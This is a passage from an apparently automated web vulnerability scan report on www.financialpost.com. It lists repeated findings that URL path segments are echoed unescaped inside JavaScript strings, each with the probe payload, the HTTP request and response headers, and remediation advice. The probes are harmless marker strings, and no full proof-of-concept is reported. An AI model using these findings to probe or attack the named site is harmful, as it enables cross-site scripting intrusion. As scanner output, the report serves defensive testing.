P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36559
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d964b'%3bf411e228aea was submitted in the REST URL parameter 1. This input was echoed as d964b';f411e228aea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /marketsd964b'%3bf411e228aea/news/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43272
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16774'%3b529b04d3c55 was submitted in the REST URL parameter 2. This input was echoed as 16774';529b04d3c55 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/news16774'%3b529b04d3c55/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43236
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd1f9'%3b8cef738f732 was submitted in the REST URL parameter 1. This input was echoed as fd1f9';8cef738f732 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /marketsfd1f9'%3b8cef738f732/portfolio/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36555
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b4b8'%3b7f13b8163b5 was submitted in the REST URL parameter 2. This input was echoed as 6b4b8';7f13b8163b5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/portfolio6b4b8'%3b7f13b8163b5/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43336
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 649ce'%3b4439dbc4f71 was submitted in the REST URL parameter 1. This input was echoed as 649ce';4439dbc4f71 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets649ce'%3b4439dbc4f71/results/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43332
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71eb2'%3bf1a79b216fd was submitted in the REST URL parameter 2. This input was echoed as 71eb2';f1a79b216fd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/results71eb2'%3bf1a79b216fd/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36478
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82fca'%3b5879819d15f was submitted in the REST URL parameter 3. This input was echoed as 82fca';5879819d15f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/results/82fca'%3b5879819d15f HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43338
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b104'%3bd58474cdcee was submitted in the REST URL parameter 1. This input was echoed as 3b104';d58474cdcee in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets3b104'%3bd58474cdcee/watchlist/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43371
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c584d'%3b08f996d92a7 was submitted in the REST URL parameter 2. This input was echoed as c584d';08f996d92a7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/watchlistc584d'%3b08f996d92a7/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43336
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31b1d'%3bb196f6b29d6 was submitted in the REST URL parameter 1. This input was echoed as 31b1d';b196f6b29d6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets31b1d'%3bb196f6b29d6/watchlist/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43372
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a46f1'%3ba08a2ab8328 was submitted in the REST URL parameter 2. This input was echoed as a46f1';a08a2ab8328 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/watchlista46f1'%3ba08a2ab8328/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43336
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2418'%3bce201111d5b was submitted in the REST URL parameter 3. This input was echoed as a2418';ce201111d5b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/watchlist/a2418'%3bce201111d5b HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43380
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f208'%3b0c5a12752b was submitted in the REST URL parameter 1. This input was echoed as 7f208';0c5a12752b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /most-popular7f208'%3b0c5a12752b/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:16:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:16:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36386
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a535'%3b42bfa164203 was submitted in the REST URL parameter 1. This input was echoed as 8a535';42bfa164203 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news8a535'%3b42bfa164203/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36240
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c300'%3bc784a23242d was submitted in the REST URL parameter 1. This input was echoed as 3c300';c784a23242d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news3c300'%3bc784a23242d/FP500/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37381
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5c6d'%3bfe08f537a24 was submitted in the REST URL parameter 2. This input was echoed as f5c6d';fe08f537a24 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/FP500f5c6d'%3bfe08f537a24/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43189
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ff81'%3b99734784d32 was submitted in the REST URL parameter 1. This input was echoed as 8ff81';99734784d32 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news8ff81'%3b99734784d32/business-insider/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37601
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d86'%3b8b9d58f9044 was submitted in the REST URL parameter 2. This input was echoed as 72d86';8b9d58f9044 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/business-insider72d86'%3b8b9d58f9044/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43410
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91d79'%3b8edda2a7d69 was submitted in the REST URL parameter 1. This input was echoed as 91d79';8edda2a7d69 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
